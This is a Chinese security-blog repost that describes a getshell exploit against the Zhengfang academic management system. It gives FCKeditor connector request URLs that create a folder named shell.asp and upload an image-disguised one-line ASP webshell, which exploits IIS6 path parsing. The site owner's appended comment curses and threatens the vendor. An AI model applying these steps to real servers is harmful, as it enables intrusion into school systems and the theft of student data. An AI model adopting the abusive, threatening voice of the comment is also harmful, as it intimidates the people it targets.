正方教务管理系统漏洞(getshell)

admin
admin
admin
101400
文章
87
评论
2021年4月3日20:06:52评论232 views字数 748阅读2分29秒阅读模式

转自:http://t00ls.net/viewthread.php?tid=19888&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000&page=1

比较鸡肋,利用IIS6解析,需支持asp

很简单的一个问题,又是死在fckeditor编辑器上。

http://www.xxx.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

建立一文件夹shell.asp

构造一表单,上传图片一句话马

Command=FileUpload&Type=Media&CurrentFolder=shell.asp" method="post">

上传文件:

http://www.xxx.com/userfiles/media/shell.asp/test_asp;1.jpg

连接之。。。。

声明:该漏洞己提交官方,请勿利用该漏洞做非法事务,任何个人或单位利用该漏洞所造成的一切后果,均与本人无关。

站长评论:

听这位发漏洞的同学说,官方貌似很牛逼?不让发,还叫嚣着:后果自负!

那个什么垃圾公司,你他妈的算哪根葱?敢跟黑客叫板?你他妈的活腻了还是脑袋叫驴踢了?

一旦惹毛黑客,请该公司后果自负!

留言评论(旧系统):

【匿名者】 @ 2011-12-22 00:37:55

这个怎么测试上传不了呢?

本站回复:

我没有试过,不清楚……

文章来源于lcx.cc:正方教务管理系统漏洞(getshell)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:06:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   正方教务管理系统漏洞(getshell)http://cn-sec.com/archives/325551.html

发表评论

匿名网友 填写信息